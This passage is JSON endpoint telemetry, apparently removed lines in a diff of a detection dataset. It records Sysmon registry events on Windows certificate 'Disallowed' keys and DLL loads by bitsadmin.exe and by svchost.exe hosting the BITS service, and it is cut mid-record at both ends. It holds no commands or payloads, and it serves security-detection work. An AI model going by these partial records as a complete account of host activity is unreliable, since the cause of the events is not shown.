"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 3980, - 
"process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": 
"C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "qmgr.dll", - "image_path": "C:\\Windows\\System32\\qmgr.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
